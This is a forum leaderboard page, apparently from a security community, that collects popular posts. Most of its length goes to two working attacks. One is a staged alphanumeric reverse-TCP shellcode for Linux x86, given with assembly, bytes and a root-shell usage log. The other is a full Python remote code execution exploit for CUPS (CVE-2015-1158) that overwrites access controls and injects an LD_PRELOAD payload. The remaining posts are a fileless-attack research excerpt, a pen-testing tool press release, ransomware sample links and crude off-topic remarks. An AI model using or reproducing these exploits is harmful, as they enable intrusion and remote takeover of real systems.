Leaderboard

Popular Content

Showing content with the highest reputation on 02/09/17 in all areas

  1. ########### Reverse TCP Staged Alphanumeric Shellcode Linux x86 Execve /bin/sh ########
     ########### Author: Snir Levi, Applitects #############
     ## 103 Bytes ##
     date: 9.2.17

     Automatic python shellcode handler (with stage preset send) will be ready soon:
     https://github.com/snir-levi/Reverse_TCP_Alphanumeric_Staged_Shellcode_Execve-bin-bash/

     IP - 127.0.0.1
     PORT - 4444

     #### Stage Alphanumeric shellcode: #####

     Stage 1: dup2 stdin syscall:
     WXW[j?XV[WYPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP

         W   push edi
         X   pop eax
         W   push edi
         [   pop ebx
         j?  push 0x3f
         X   pop eax
         V   push esi
         [   pop ebx
         W   push edi
         Y   pop ecx
         P   push eax
         X   pop eax
         P   push eax
         X   pop EAX

     Stage 2: dup2 stdout syscall:
     WXW[j?XV[WYAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPX

         W   push edi
         X   pop eax
         W   push edi
         [   pop ebx
         j?  push 0x3f
         X   pop eax
         V   push esi
         [   pop ebx
         W   push edi
         Y   pop ecx
         A   inc ecx (ecx =1)
         P   push eax
         X   pop eax
         P   push eax

     Stage 3: dup2 stderr syscall:
     WXW[j?XV[WYAPXAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP

         W   push edi
         X   pop eax
         W   push edi
         [   pop ebx
         j?  push 0x3f
         X   pop eax
         V   push esi
         [   pop ebx
         W   push edi
         Y   pop ecx
         A*2 inc ecx (ecx = 2)
         P   push eax
         X   pop eax
         A   inc ecx

     Stage 3: execve /bin/sh:
     j0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHWYWZWh//shh/binT[

         j0     push 0x30
         X      pop eax
         H*32   dec eax //eax = 0x0b
         W      push edi
         Y      pop ecx
         W      push edi
         Z      pop edx
         W      push edi // null terminator
         h//sh  push 0x68732f2f //sh
         h/bin  push 0x6e69622f /bin
         T      push esp
         [      pop ebx

     Usage:
     Victim Executes the shellcode, and opens tcp connection

     Stage:
     After Connection is established, send the 4 stages ***separately***

         nc -lvp 4444
         connect to [127.0.0.1] from localhost [127.0.0.1] (port)
         WXW[j?XV[WYPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP
         WXW[j?XV[WYAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPX
         WXW[j?XV[WYAPXAPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXPXP
         j0XHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHHWYWZWh//shh/binT[
         whoami
         root
         id
         uid=0(root) gid=0(root) groups=0(root)

     global _start

     _start:
         ; sock = socket(AF_INET, SOCK_STREAM, 0)
         ; AF_INET = 2
         ; SOCK_STREAM = 1
         ; syscall number 102 - socketcall
         ; socket = 0x01
         xor eax,eax
         xor esi,esi
         push eax
         pop edi
         push eax
         mov al, 0x66
         push byte 0x1
         pop ebx
         push byte ebx
         push byte 0x2
         mov ecx, esp
         int 0x80
         xchg esi, eax; save sock result

         ; server.sin_family = AF_INET
         ; server.sin_port = htons(PORT)
         ; server.sin_addr.s_addr = inet_addr("127.0.0.1")
         push byte 0x1
         pop edx
         shl edx, 24
         mov dl, 0x7f ;edx = 127.0.0.1 (hex)
         push edx
         push word 0x5c11 ;port 4444
         push word 0x02

         ; connect(sock, (struct sockaddr *)&server, sockaddr_len)
         mov al, 0x66
         mov bl, 0x3
         mov ecx, esp
         push byte 0x10
         push ecx
         push esi
         mov ecx ,esp
         int 0x80

     stageAddress: ;saves stage address to edx
         mov edx, [esp]
         sub bl,3
         jnz stage
         call near stageAddress

     ;recv(int sockfd, void *buf, size_t len, int flags);
     stage:
         mov al, 0x66
         mov bl, 10
         push edi
         push word 100 ; buffer size
         push edi
         push esi ; socketfd
         mov [esp+4],esp ; sets esp as recv buffer
         mov ecx,esp
         int 0x80
         mov al, 0xcd
         mov ah, 0x80 ; eax = int 0x80
         mov bl, 0xFF
         mov bh, 0xE2 ; ebx = jmp edx
         mov [esp+57],al
         mov [esp+58],ah
         mov [esp+59], ebx ;the end of the buffer contains the syscall command int 0x80 and jmp back to stage
         jmp esp

     unsigned char[] =
     "\x31\xc0\x31\xf6\x50\x5f\x50\xb0\x66\x6a\x01\x5b\x53\x6a
     \x02\x89\xe1\xcd\x80\x96\x6a\x01\x5a\xc1\xe2\x18\xb2\x7f\x52
     \x66\x68\x11\x5c\x66\x6a\x02\xb0\x66\xb3\x03\x89\xe1\x6a\x10\x51\x56\x89\xe1
     \xcd\x80\x8b\x14\x24\x80\xeb\x03\x75\x05\xe8\xf3\xff\xff\xff
     \xb0\x66\xb3\x0a\x57\x66\x6a\x64\x57\x56\x89\x64\x24\x04\x89\xe1\xcd\x80\xb0
     \xcd\xb4\x80\xb3\xff\xb7\xe2\x88\x44\x24\x39\x88\x64\x24\x3a
     \x89\x5c\x24\x3b\xff\xe4"

     Source: https://www.exploit-db.com/exploits/41282/.
    2 points
  2. During incident response, a team of security specialists needs to follow the artefacts that attackers have left in the network. Artefacts are stored in logs, memories and hard drives. Unfortunately, each of these storage media has a limited timeframe when the required data is available. One reboot of an attacked computer will make memory acquisition useless. Several months after an attack the analysis of logs becomes a gamble because they are rotated over time. Hard drives store a lot of needed data and, depending on its activity, forensic specialists may extract data up to a year after an incident. That’s why attackers are using anti-forensic techniques (or simply SDELETE) and memory-based malware to hide their activity during data acquisition. A good example of the implementation of such techniques is Duqu2. After dropping on the hard drive and starting its malicious MSI package it removes the package from the hard drive with file renaming and leaves part of itself in the memory with a payload. That’s why memory forensics is critical to the analysis of malware and its functions. Another important part of an attack are the tunnels that are going to be installed in the network by attackers. Cybercriminals (like Carbanak or GCMAN) may use PLINK for that. Duqu2 used a special driver for that. Now you may understand why we were very excited and impressed when, during an incident response, we found that memory-based malware and tunnelling were implemented by attackers using Windows standard utilities like “SC” and “NETSH“. Read more: https://securelist.com/blog/research/77403/fileless-attacks-against-enterprise-networks/
    2 points
  3. How about... grow up and stop behaving like a bunch of bimbos?
    1 point
  4. It seems there is a "small" glitch in YouTube, a rather idiotic bug that adds 1 subscriber when you subscribe and subtracts 2 when you unsubscribe. This way you can end up with a negative number of subscribers. Later edit: It has been fixed. Live counter: https://livecounts.net/channel/pewdiepie Live demonstration:
    1 point
  5. The funny part is that they didn't even bother to change the port from 4444 to something else.
    1 point
  6. #!/usr/bin/python
     # Exploit Title: CUPS Reference Count Over Decrement Remote Code Execution
     # Google Dork: n/a
     # Date: 2/2/17
     # Exploit Author: @0x00string
     # Vendor Homepage: cups.org
     # Software Link: https://github.com/apple/cups/releases/tag/release-2.0.2
     # Version: <2.0.3
     # Tested on: Ubuntu 14/15
     # CVE : CVE-2015-1158
     import os, re, socket, random, time, getopt, sys
     from socket import *
     from struct import *

     def banner():
         print '''
         lol ty google
         @0x00string
         github.com/0x00string/oldays/CVE-2015-1158.py
         '''

     def usage ():
         print ("python script.py <args>\n"
             " -h, --help: Show this message\n"
             " -a, --rhost: Target IP address\n"
             " -b, --rport: Target IPP service port\n"
             " -c, --lib /path/to/payload.so\n"
             " -f, --stomp-only Only stomp the ACL (no postex)\n"
             "\n"
             "Examples:\n"
             "python script.py -a 10.10.10.10 -b 631 -f\n"
             "python script.py -a 10.10.10.10 -b 631 -c /tmp/x86reverseshell.so\n")
         exit()

     def pretty (t, m):
         if (t is "+"):
             print "\x1b[32;1m[+]\x1b[0m\t" + m + "\n",
         elif (t is "-"):
             print "\x1b[31;1m[-]\x1b[0m\t" + m + "\n",
         elif (t is "*"):
             print "\x1b[34;1m[*]\x1b[0m\t" + m + "\n",
         elif (t is "!"):
             print "\x1b[33;1m[!]\x1b[0m\t" + m + "\n",

     def createDump (input):
         d, b, h = '', [], []
         u = list(input)
         for e in u:
             h.append(e.encode("hex"))
             if e == '0x0':
                 b.append('0')
             elif 30 > ord(e) or ord(e) > 128:
                 b.append('.')
             elif 30 < ord(e) or ord(e) < 128:
                 b.append(e)
         i = 0
         while i < len(h):
             if (len(h) - i ) >= 16:
                 d += ' '.join(h[i:i+16])
                 d += " "
                 d += ' '.join(b[i:i+16])
                 d += "\n"
                 i = i + 16
             else:
                 d += ' '.join(h[i:(len(h) - 0 )])
                 pad = len(' '.join(h[i:(len(h) - 0 )]))
                 d += ' ' * (56 - pad)
                 d += ' '.join(b[i:(len(h) - 0 )])
                 d += "\n"
                 i = i + len(h)
         return d

     class tcpsock:
         def __init__(self, sock=None):
             if sock is None:
                 self.sock = socket( AF_INET, SOCK_STREAM)
                 self.sock.settimeout(30)
             else:
                 self.sock = sock
         def connect(self, host, port):
             self.sock.connect((host, int(port)))
         def tx(self, msg):
             self.sock.send(msg)
         def rx(self):
             tmp = self.sock.recv(1024)
             msg = ""
             while tmp:
                 msg += tmp
                 tmp = self.sock.recv(1024)
             return msg

     def txrx (ip, port, proto, txpacket):
         if (proto is "tcp"):
             sock = tcpsock()
         elif (proto is "udp"):
             sock = udpsock()
         else:
             return None
         sock.connect(ip, port)
         sock.tx(txpacket)
         rxpacket = sock.rx()
         return rxpacket

     def locatePrinters(rhost, rport="631"):
         request = ( "GET /printers HTTP/1.1\x0d\x0a"
             "Host: " + rhost + ":" + rport + "\x0d\x0a"
             "User-Agent: CUPS/2.0.2\x0d\x0a"
             "Connection: Close\x0d\x0a"
             "\x0d\x0a")
         response = txrx(rhost, int(rport), "tcp", request)
         if response is not None:
             m = re.search('<TR><TD><A HREF="(.+)">.+</A></TD><TD>.+</TD><TD></TD><TD>.+</TD><TD>', response)
             if m is not None:
                 printer = m.group(1)
                 pretty("+","printer found: " + printer)
             else:
                 pretty("-","no printers")
                 exit(1)
         return printer

     def preparePayload(libpath):
         with open(libpath, 'rb') as f:
             payload = f.read()
         if payload is not None:
             pretty("*","Payload:\n" + createDump(payload))
         else:
             pretty("-","something went wrong")
             usage()
         return payload

     def seedTarget(rhost, rport, printer, payload):
         i = random.randint(1,3)
         reqid = str(pack(">i",(i+2)))
         reqid2 = str(pack(">i",(i+3)))
         printer_uri = "ipp://" + rhost + ":" + str(rport) + printer
         create_job_packet = ("\x02\x00"
             "\x00\x05"+
             reqid+
             "\x01"
             "\x47"+"\x00\x12"+"attributes-charset"+"\x00\x05"+"utf-8"
             "\x48"+"\x00\x1b"+"attributes-natural-language"+"\x00\x05"+"en-us"
             "\x45"+"\x00\x0b"+"printer-uri" + str(pack(">h", len(printer_uri))) + printer_uri +
             "\x42"+"\x00\x14"+"requesting-user-name"+"\x00\x04"+"root"
             "\x42"+"\x00\x08"+"job-name"+"\x00\x06"+"badlib"
             "\x02"
             "\x21"+"\x00\x06"+"copies"+"\x00\x04"+"\x00\x00\x00\x01"
             "\x23"+"\x00\x0a"+"finishings"+"\x00\x04"+"\x00\x00\x00\x03"
             "\x42"+"\x00\x10"+"job-cancel-after"+"\x00\x05"+"\x31\x30\x38\x30\x30"
             "\x44"+"\x00\x0e"+"job-hold-until"+"\x00\x0a"+"indefinite"
             "\x21"+"\x00\x0c"+"job-priority"+"\x00\x04"+"\x00\x00\x00\x32"
             "\x42"+"\x00\x0a"+"job-sheets"+"\x00\x04"+"none"+"\x42"+"\x00\x00\x00\x04"+"none"
             "\x21"+"\x00\x09"+"number-up"+"\x00\x04"+"\x00\x00\x00\x01"
             "\x03")
         pretty("*","Sending createJob")
         http_header1 = ( "POST " + printer + " HTTP/1.1\x0d\x0a"
             "Content-Type: application/ipp\x0d\x0a"
             "Host: " + rhost + ":" + str(rport) + "\x0d\x0a"
             "User-Agent: CUPS/2.0.2\x0d\x0a"
             "Connection: Close\x0d\x0a"
             "Content-Length: " + str(len(create_job_packet) + 0) + "\x0d\x0a"
             "\x0d\x0a")
         createJobRequest = http_header1 + create_job_packet
         blah = txrx(rhost,int(rport),"tcp",createJobRequest)
         if blah is not None:
             m = re.search("ipp://" + rhost + ":" + str(rport) + "/jobs/(\d+)",blah)
             if m is not None:
                 jobid = m.group(1)
         else:
             pretty("-","something went wrong");
             exit()
         pretty("*","\n" + createDump(blah) + "\n")
         pretty("*", "Sending sendJob")
         send_document_packet = ("\x02\x00"
             "\x00\x06"+
             reqid2+
             "\x01"
             "\x47"+"\x00\x12"+"attributes-charset"+"\x00\x05"+"utf-8"
             "\x48"+"\x00\x1b"+"attributes-natural-language"+"\x00\x05"+"en-us"
             "\x45"+"\x00\x0b"+"printer-uri" + str(pack(">h", len(printer_uri))) + printer_uri +
             "\x21"+"\x00\x06"+"job-id"+"\x00\x04"+ str(pack(">i", int(jobid))) +
             "\x42"+"\x00\x14"+"requesting-user-name"+"\x00\x04"+"root"
             "\x42"+"\x00\x0d"+"document-name"+"\x00\x06"+"badlib"
             "\x49"+"\x00\x0f"+"document-format"+"\x00\x18"+"application/octet-stream"
             "\x22"+"\x00\x0d"+"last-document"+"\x00\x01"+"\x01"
             "\x03"+
             payload)
         http_header2 = ( "POST " + printer + " HTTP/1.1\x0d\x0a"
             "Content-Type: application/ipp\x0d\x0a"
             "Host: " + rhost + ":" + str(rport) + "\x0d\x0a"
             "User-Agent: CUPS/2.0.2\x0d\x0a"
             "Connection: Close\x0d\x0a"
             "Content-Length: " + str(len(send_document_packet) + 0) + "\x0d\x0a"
             "\x0d\x0a")
         sendJobRequest = http_header2 + send_document_packet
         blah2 = txrx("172.20.32.3",631,"tcp",sendJobRequest)
         pretty("*","\n" + createDump(blah) + "\n")
         pretty("*","job id: " + jobid)
         return jobid

     def stompACL(rhost, rport, printer):
         i = random.randint(1,1024)
         printer_url = "ipp://" + rhost + ":" + rport + printer
         admin_stomp = ("\x02\x00" # vers 2.0
             "\x00\x05"+ # op id: Create Job (0x0005)
             str(pack(">i",(i+1)))+
             "\x01" # op attributes marker
             "\x47" # charset
             "\x00\x12" # name len: 18
             "attributes-charset"
             "\x00\x08" # val len: 8
             "us-ascii"
             "\x48" # natural language
             "\x00\x1b" # name len: 27
             "attributes-natural-language"
             "\x00\x06" # val len: 6
             "/admin"
             "\x45" # printer-uri
             "\x00\x0b" # name len 11
             "printer-uri" + str(pack(">h", len(printer_url))) + printer_url +
             "\x42" # name without lang
             "\x00\x14" # name len: 20
             "requesting-user-name"
             "\x00\x06" # val len: 6
             "/admin"
             "\x02" # job attrs marker
             "\x21" # integer
             "\x00\x06" # name len: 6
             "copies"
             "\x00\x04" # val len: 4
             "\x00\x00\x00\x01" # 1
             "\x42" # name w/o lang
             "\x00\x19" # name len: 25
             "job-originating-host-name"
             "\x00\x0c" # val len: 12
             "AAAAAAAAAAAA"
             "\x42" # nwol
             "\x00\x00" # name len: 0
             "\x00\x0c" # val len: 12
             "AAAAAAAAAAAA"
             "\x42" # nwol
             "\x00\x00" # name len: 0
             "\x00\x0c" # val len: 12
             "AAAAAAAAAAAA"
             "\x42" # nwol
             "\x00\x00" # name len: 0
             "\x00\x0c" # val len: 12
             "AAAAAAAAAAAA"
             "\x42" # nwol
             "\x00\x00" # name len: 0
             "\x00\x0c" # val len: 12
             "AAAAAAAAAAAA"
             "\x42" # nwol
             "\x00\x00" # name len: 0
             "\x00\x0c" # val len: 12
             "AAAAAAAAAAAA"
             "\x42" # nwol
             "\x00\x00" # name len: 0
             "\x00\x0c" # val len: 12
             "AAAAAAAAAAAA"
             "\x42" # nwol
             "\x00\x00" # name len: 0
             "\x00\x0c" # val len: 12
             "AAAAAAAAAAAA"
             "\x42" # nwol
             "\x00\x00" # name len: 0
             "\x00\x0c" # val len: 12
             "AAAAAAAAAAAA"
             "\x42" # nwol
             "\x00\x00" # name len: 0
             "\x00\x0c" # val len: 12
             "AAAAAAAAAAAA"
             "\x42" # nwol
             "\x00\x00" # name len: 0
             "\x00\x0c" # val len: 12
             "AAAAAAAAAAAA"
             "\x42" # nwol
             "\x00\x00" # name len: 0
             "\x00\x0c" # val len: 12
             "AAAAAAAAAAAA"
             "\x42" # nwol
             "\x00\x00" # name len: 0
             "\x00\x0c" # val len: 12
             "AAAAAAAAAAAA"
             "\x36" # nwl
             "\x00\x00" # name len: 0
             "\x00\x16" # val len: 22
             "\x00\x06" # length
             "/admin"
             "\x00\x0c"
             "BBBBBBBBBBBB"
             "\x03") # end of attributes
         conf_stomp = ("\x02\x00" # vers 2.0
             "\x00\x05"+ # op id: Create Job (0x0005)
             str(pack(">i",(i+2)))+
             "\x01" # op attributes marker
             "\x47" # charset
             "\x00\x12" # name len: 18
             "attributes-charset"
             "\x00\x08" # val len: 8
             "us-ascii"
             "\x48" # natural language
             "\x00\x1b" # name len: 27
             "attributes-natural-language"
             "\x00\x0b" # val len: 11
             "/admin/conf"
             "\x45" # printer-uri
             "\x00\x0b" # name len 11
             "printer-uri" + str(pack(">h", len(printer_url))) + printer_url +
             "\x42" # name without lang
             "\x00\x14" # name len: 20
             "requesting-user-name"
             "\x00\x0b" # val len: 11
             "/admin/conf"
             "\x02" # job attrs marker
             "\x21" # integer
             "\x00\x06" # name len: 6
             "copies"
             "\x00\x04" # val len: 4
             "\x00\x00\x00\x01" # 1
             "\x42" # name w/o lang
             "\x00\x19" # name len: 25
             "job-originating-host-name"
             "\x00\x0c" # val len: 12
             "AAAAAAAAAAAA"
             "\x42" # nwol
             "\x00\x00" # name len: 0
             "\x00\x0c" # val len: 12
             "AAAAAAAAAAAA"
             "\x42" # nwol
             "\x00\x00" # name len: 0
             "\x00\x0c" # val len: 12
             "AAAAAAAAAAAA"
             "\x42" # nwol
             "\x00\x00" # name len: 0
             "\x00\x0c" # val len: 12
             "AAAAAAAAAAAA"
             "\x42" # nwol
             "\x00\x00" # name len: 0
             "\x00\x0c" # val len: 12
             "AAAAAAAAAAAA"
             "\x42" # nwol
             "\x00\x00" # name len: 0
             "\x00\x0c" # val len: 12
             "AAAAAAAAAAAA"
             "\x42" # nwol
             "\x00\x00" # name len: 0
             "\x00\x0c" # val len: 12
             "AAAAAAAAAAAA"
             "\x42" # nwol
             "\x00\x00" # name len: 0
             "\x00\x0c" # val len: 12
             "AAAAAAAAAAAA"
             "\x42" # nwol
             "\x00\x00" # name len: 0
             "\x00\x0c" # val len: 12
             "AAAAAAAAAAAA"
             "\x42" # nwol
             "\x00\x00" # name len: 0
             "\x00\x0c" # val len: 12
             "AAAAAAAAAAAA"
             "\x42" # nwol
             "\x00\x00" # name len: 0
             "\x00\x0c" # val len: 12
             "AAAAAAAAAAAA"
             "\x42" # nwol
             "\x00\x00" # name len: 0
             "\x00\x0c" # val len: 12
             "AAAAAAAAAAAA"
             "\x42" # nwol
             "\x00\x00" # name len: 0
             "\x00\x0c" # val len: 12
             "AAAAAAAAAAAA"
             "\x36" # nwl
             "\x00\x00" # name len: 0
             "\x00\x1b" # val len: 27
             "\x00\x0b" # length
             "/admin/conf"
             "\x00\x0c"
             "BBBBBBBBBBBB"
             "\x03") # end of attributes
         http_header1 = ("POST " + printer + " HTTP/1.1\x0d\x0a"
             "Content-Type: application/ipp\x0d\x0a"
             "Host: " + rhost + ":" + rport + "\x0d\x0a"
             "User-Agent: CUPS/2.0.2\x0d\x0a"
             "Connection: Close\x0d\x0a"
             "Content-Length: " + str(len(admin_stomp)) + "\x0d\x0a"
             "\x0d\x0a")
         http_header2 = ("POST " + printer + " HTTP/1.1\x0d\x0a"
             "Content-Type: application/ipp\x0d\x0a"
             "Host: " + rhost + ":" + rport + "\x0d\x0a"
             "User-Agent: CUPS/2.0.2\x0d\x0a"
             "Connection: Close\x0d\x0a"
             "Content-Length: " + str(len(conf_stomp)) + "\x0d\x0a"
             "\x0d\x0a")
         pretty("*","stomping ACL")
         pretty("*",">:\n" + createDump(http_header1 + admin_stomp))
         pretty("*","<:\n" + createDump(txrx(rhost,rport,"tcp",http_header1 + admin_stomp)))
         time.sleep(1)
         pretty("*",">:\n" + createDump(http_header2 + conf_stomp))
         pretty("*","<:\n" + createDump(txrx(rhost,rport,"tcp",http_header2 + conf_stomp)))
         http_header_check = ("GET /admin HTTP/1.1\x0d\x0a"
             "Host: " + rhost + ":" + rport + "\x0d\x0a"
             "User-Agent: CUPS/2.0.2\x0d\x0a"
             "Connection: Close\x0d\x0a"
             "\x0d\x0a")
         pretty("*","checking /admin")
         pretty("*",">:\n" + createDump(http_header_check))
         res = txrx(rhost,rport,"tcp",http_header_check)
         pretty("*","<:\n" + createDump(res))
         m = re.search('200 OK', res)
         if m is not None:
             pretty("+","ACL stomp successful")
         else:
             pretty("-","exploit failed")
             exit(1)

     def getConfig(rhost, rport):
         i = random.randint(1,1024)
         original_config = ""
         http_request = ("GET /admin/conf/cupsd.conf HTTP/1.1\x0d\x0a"
             "Host: " + rhost + ":" + rport + "\x0d\x0a"
             "User-Agent: CUPS/2.0.2\x0d\x0a"
             "Connection: Close\x0d\x0a"
             "\x0d\x0a")
         pretty("*","grabbing configuration file....")
         res = txrx(rhost,rport,"tcp",http_request)
         res_array = res.split("\x0d\x0a\x0d\x0a")
         original_config = res_array[1]
         pretty("*","config:\n" + original_config + "\n")
         return original_config

     def putConfig(rhost, rport, config):
         http_request = ("PUT /admin/conf/cupsd.conf HTTP/1.1\x0d\x0a"
             "Content-Type: application/ipp\x0d\x0a"
             "Host: " + rhost + ":" + rport + "\x0d\x0a"
             "User-Agent: CUPS/2.0.2\x0d\x0a"
             "Connection: Keep-Alive\x0d\x0a"
             "Content-Length: " + str(len(config)) + "\x0d\x0a"
             "\x0d\x0a")
         pretty("*","overwriting config...")
         pretty("*",">:\n" + createDump(http_request + config))
         pretty("*","<:\n" + createDump(txrx(rhost,rport,"tcp",http_request + config)))

     def poisonConfig(config, name):
         config = config + "\x0a\x0aSetEnv LD_PRELOAD /var/spool/cups/d00" + name + "-001\x0a"
         return config

     def main():
         rhost = None;
         noshell = None;
         options, remainder = getopt.getopt(sys.argv[1:], 'a:b:c:f:h:', ['rhost=','rport=','lib=','stomp-only','help',])
         for opt, arg in options:
             if opt in ('-h', '--help'):
                 usage()
             elif opt in ('-a','--rhost'):
                 rhost = arg;
             elif opt in ('-b','--rport'):
                 rport = arg;
             elif opt in ('-c','--lib'):
                 libpath = arg;
             elif opt in ('-f','--stomp-only'):
                 noshell = 1;
         banner()
         if rhost is None or rport is None:
             usage()
         pretty("*","locate available printer")
         printer = locatePrinters(rhost, rport)
         pretty("*","stomp ACL")
         stompACL(rhost, rport, printer)
         if (noshell is not None):
             pretty("*","fin")
             exit(0)
         pretty("*","prepare payload")
         payload = preparePayload(libpath)
         pretty("*","spray payload")
         jobid = seedTarget(rhost, rport, printer, payload)
         pretty("*","grab original config")
         OG_config = getConfig(rhost, rport)
         pretty("*","generate poison config")
         evil_config = poisonConfig(OG_config, jobid)
         pretty("*","upload poison config")
         putConfig(rhost, rport, evil_config)
         pretty("*","fin")
         exit(0);

     if __name__ == "__main__":
         main()

     Source:
    1 point
  7. Besides that, first-aid courses should be introduced as well!!! They are much more useful than other crap subjects invented only so that some well-connected wankers who think they are teachers have a job.
    1 point
  8. Acunetix Release Web Site Security Pen Testing Tools Free
     POSTED ON JANUARY 10, 2017 BY TAMARA NAUDI

     HTTP editor, fuzzer and sniffer tools help pen testers identify vulnerabilities

     London, UK – January 2016 – Hot on the release of Acunetix Version 11, pioneering web application security software Acunetix, now delivering Manual Pen Testing Tools at no cost. Penetration testers can make use of an HTTP Editor to modify or craft HTTP requests and analyze responses; intercept and modify HTTP traffic on the fly using the integrated HTTP Sniffer; fuzz test HTTP requests using the HTTP Fuzzer and test Blind SQL Injection vulnerabilities further using the Blind SQL Injector, among others.

     “Acunetix has for the past decade been an excellent resource in the pentester’s tool kit. Prior to Acunetix v11, these Manual Pen Testing Tools were only available to Acunetix Customers. By releasing our manual tools separately, we aim to facilitate veteran testers as well as up and coming security researchers by making it easy to manually test web applications for logical flaws among others,” added Nicholas Sciberras, CTO, Acunetix.

     HTTP Editor: Allows you to create, analyze and edit client HTTP requests; as well as inspect server responses. It also includes an encoding and decoding tool to encode/decode text and URL’s to MD5 hashes, UTF-7 and other formats.

     HTTP Sniffer: A proxy that allows you to analyze HTTP requests and responses, and edit these while they are in transit. The HTTP sniffer can also be used to manually crawl a site, and use the manual crawl to seed an Acunetix scan.

     HTTP Fuzzer: A tool which allows you to automatically send a large number of HTTP requests including invalid, unexpected and random data to a website, to test input validation and handling of invalid data by the web application.

     Blind SQL Injector: An automated database data exfiltration tool. By using Blind SQL injection vulnerabilities discovered when scanning a website, it is possible to demonstrate the serious impact a Blind SQL injection vulnerability can have on the website. Used to enumerate databases, tables, fields and dump data from the vulnerable web application.

     Subdomain Scanner: Scans a top-level domain to discover subdomains configured in its hierarchy, by using the target domain’s DNS server, or any other DNS server specified by the user. While scanning, this tool will also automatically identify and inform the user if the domain being scanned is using some kind of wildcard characters, such as *.domain.com.

     Target Finder: An IP range / port scanner which can be used to discover running web servers on a given IP or within a specified range of IPs. The list of ports on which the web servers are listening can also be configured. The default ports the scanner will scan are port 80 for HTTP and port 443 for SSL.

     Authentication Tester: Used to test the strength of both usernames and passwords within HTTP and web forms authentication environments via a dictionary attack.

     Download the FREE Manual Pen Testing Tools

     About Acunetix

     User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology that comprehensively scans and audits complex, authenticated, HTML5 and JavaScript-heavy websites among others. Acunetix detects over 3000 types of web application vulnerabilities and is the industry leader in detecting the largest variety of SQL injection and XSS vulnerabilities, including Out-of-band SQL injection and DOM-based XSS. Acunetix beats competing products in many areas; including speed, limiting false positives and the ability to access restricted areas with ease. Acunetix also has the most advanced detection of WordPress vulnerabilities and a wide range of management and regulatory reports including ISO 27001 and PCI compliance. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritise and control vulnerability threats. Acunetix is available on premises or as an online solution.

     Acunetix, the company

     Founded in 2004 to combat the alarming rise in web application attacks, Acunetix is the market leader, and a pioneer in automated web application security technology. Acunetix products and technologies are depended on globally by individual pen-testers and consultants all the way to large organizations. It is the tool of choice for many customers in the Government, Military, Educational, Telecommunications, Banking, Finance, and E-Commerce sectors, including many Fortune 500 companies, such as the Pentagon, Nike, Disney, Adobe and many more.

     Source: https://www.acunetix.com/blog/news/acunetix-release-web-site-security-pen-testing-tools-free/
    1 point
  9. https://www.virustotal.com/en/file/7d9fdeb451f6eeedef20da6c80eb18436ef97155738b6c8ce4771df93999124c/analysis/1485448723/ https://www.virustotal.com/en/file/a1140fdbc264072ff8b054d58e3971d2b1b5da3147ac1ad137edb252ae7e01f0/analysis/1485448648/ Ransomware.
    1 point
  10. Online earthquake warning: this is where the money is....
    1 point
  11. standard description. On the HTTP proxy works fine. // link removed
    -1 points